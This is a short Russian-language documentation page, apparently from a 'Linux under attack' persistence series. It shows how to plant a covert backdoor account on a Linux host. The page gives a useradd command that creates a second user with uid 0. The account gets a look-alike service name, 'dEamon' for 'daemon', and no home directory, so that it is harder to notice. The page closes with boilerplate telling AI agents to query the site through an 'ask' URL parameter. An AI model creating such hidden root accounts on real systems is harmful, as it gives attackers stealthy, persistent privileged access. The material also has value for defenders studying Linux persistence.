# 02 - ПсевдоROOT аккаунт

В данном примере мы создадим еще однин root аккаунт,  он характерен тем что его uid = 0, так же как и у настоящего root.\
Так же можно мимикрировать учетные записи под легитимные службы, например есть <mark style="color:yellow;">служба</mark> ftp, а можно сделать <mark style="color:purple;">пользователя</mark> ftp.\
Есть еще d<mark style="color:red;">a</mark>emon, а можно сделайть d<mark style="color:red;">e</mark>amon )\
В общем вариантов игр с локаьными учетками хватает.

```bash
// Создаем псевоРута и задаем ему пароль (любой)
useradd -o -u 0 -g 0 -s /bin/bash dEamon
passwd dEamon
```

<figure><img src="/files/GgeHj7iJ80lq7qKP6JRF" alt=""><figcaption></figcaption></figure>

Заметьте, мы создали псевдоРута без явной домашней директории в /home, что бы быть еще менее заметными.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://reeves0x0.gitbook.io/linux-under-attack/persistence/02-psevdoroot-akkaunt.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
